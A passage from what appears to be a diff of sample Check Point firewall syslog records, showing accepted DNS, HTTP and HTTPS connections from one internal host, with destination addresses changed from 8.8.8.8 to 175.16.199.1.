src:"192.168.2.2"] -<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x4,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43798"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40880"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x4,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43798"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40880"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"93.184.220.29"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46512"; service:"80"; 
service_id:"http"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60598"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60598"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"13.224.227.5"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"45142"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60645"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38909"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60516"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60645"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38909"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60516"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"13.224.227.81"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"39716"; service:"443"; 
service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"13.224.227.81"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"39714"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43738"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44020"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59568"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56804"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40868"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58090"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51741"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43738"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44020"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59568"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56804"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40868"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58090"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51741"; service:"53"; 
